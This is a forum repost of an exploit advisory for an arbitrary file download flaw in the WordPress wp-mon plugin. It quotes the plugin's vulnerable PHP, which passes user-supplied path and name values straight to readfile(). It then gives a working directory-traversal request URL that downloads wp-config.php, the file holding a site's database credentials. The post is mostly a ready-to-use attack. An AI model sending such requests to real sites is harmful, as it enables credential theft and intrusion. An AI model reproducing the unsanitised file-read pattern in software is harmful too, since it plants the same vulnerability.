Jump to content
KhiZaRix

WordPress WP-Mon Arbitrary File Download

Recommended Posts


|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|-------------------------------------------------------------------------|
| [+] Exploit Title:Wordpress wp-mon Plugin Arbitrary File Download
Vulnerability |
| [+] Exploit Author: Ashiyane Digital Security Team |
| [+] Vendor Homepage : https://wordpress.org/plugins/wp-mon/
| [+] Download Link : https://downloads.wordpress.org/plugin/wp-mon.zip
| [+] Tested on : Windows,Linux |
| [+] Date : 2015-04-16
| [+] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
| [+] Exploit: |
| [+] Vulnerable file :
http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php
|
| [+] Vulnerable Code :

<?php

header( 'Content-Type: ' . $_GET['type'] );
header( 'Content-Disposition: attachment; filename="' . $_GET['name']
. '"' );
readfile( $_GET['path'] . DIRECTORY_SEPARATOR . $_GET['name'] );

?>

| [+]
http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=[File Address]&name=[File
Name]
| [+]
| [+] Examples :
http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php
|-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|

Source: http://packetstorm.wowhacker.com/1504-exploits/wpmon-disclose.txt

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...